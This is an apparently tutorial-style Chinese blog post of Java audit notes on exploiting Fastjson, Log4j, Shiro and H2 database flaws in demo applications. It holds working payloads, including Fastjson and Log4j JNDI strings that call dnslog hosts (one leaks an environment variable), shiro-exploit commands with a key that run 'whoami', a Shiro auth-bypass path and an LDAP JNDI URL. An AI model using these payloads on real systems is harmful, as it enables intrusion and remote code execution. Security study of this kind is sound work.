当前位置: 首页 > article >正文

DAY120java审计第三方组件依赖库挖掘FastjsonShiroLog4jH2DB

article 2024/11/17 6:45:58

组件漏洞判断插件

一、Tmall_demo-master(fastjson

1、配置文件查找安装组件

1、JSON.parse(json)

2、JSON.parseObject

2、找可控的变量

3、利用组件漏洞

poc:propertyJson={"@type":"java.net.Inet4Address","val":"233997ee.log.dnslog.sbs"}

二、Tmall_demo-master(Log4j)

logger.error,logger.info函数触发

1、配置文件查找安装组件

session不可控

2、寻找可控变量

originalFileName从file.getOriginalFilename获取文件名

修改文件名利用漏洞

Poc:filename="${jndi:ldap://${env:OS}.7ffb7b28.log.dnslog.sbs}"

3、Jndi

失败

版本不在区间

三、RuoYi-v4.2(shrio版本漏洞)

/docs;/../admin/

1、密钥setCipherKey

python shiro-exploit.py check -u http://127.0.0.1

2、利用链

python shiro-exploit.py echo -g CommonsCollectionsK1 -u http://127.0.0.1 -v 2 -k fCq+/xW488hMTCD+cmJ3aQ== -c whoami

3、shiro漏洞绕过拦截器

4、/css;/../common/download利用漏洞shiro

GET /css;/../common/download HTTP/1.1

四、halo-0.4.3(h2database)

1、环境配置进入后台

2、访问h2database

javax.naming.InitialContext

ldap://192.168.93.1:1389/9nbcm6


http://www.kler.cn/a/396911.html

相关文章:

  • Java爬虫(HttpURLConnection)详解
  • 24 年第十届数维杯国际数模竞赛赛题浅析
  • 速盾:cdn 支持 php 吗?
  • T265相机双目鱼眼+imu联合标定(全记录)
  • 计算机网络HTTP——针对实习面试
  • 华为云前台展示公网访问需要购买EIP,EIP流量走向
  • uniapp vuex的使用
  • 检查Android设备当前的声音模式
  • 雨晨 25H2 Windows 11 企业版 极简 27749.1000
  • 速通前端篇 —— HTML
  • 了解 Solon MVC 的参数注入规则
  • 鸿蒙实现 web 传值
  • Ubuntu24 上安装搜狗输入法
  • 算法编程题-区间最小数乘区间和的最大值,基于数组中的数字拼接可得的小于目标值的最大数
  • java集合—List常用的方法
  • 性能优化、安全
  • 在Linux环境下部署TiDB可以通过几种不同的方法
  • 【学术论文投稿】云原生后端:解锁高效可扩展应用的魔法世界
  • 深度学习transformer
  • 什么是主成分分析
  • Python_爬虫3_Requests库网络爬虫实战(5个实例)
  • Qt 5.6.3 手动配置 mingw 环境
  • manjaro蓝牙鼠标无法连接问题解决
  • Front Panel Window Bounds 与 Front Panel Window Bounds 的区别与应用
  • burp无法抓app包的原因以及如何测试
  • Android OpenGL ES详解——glTexImage2D方法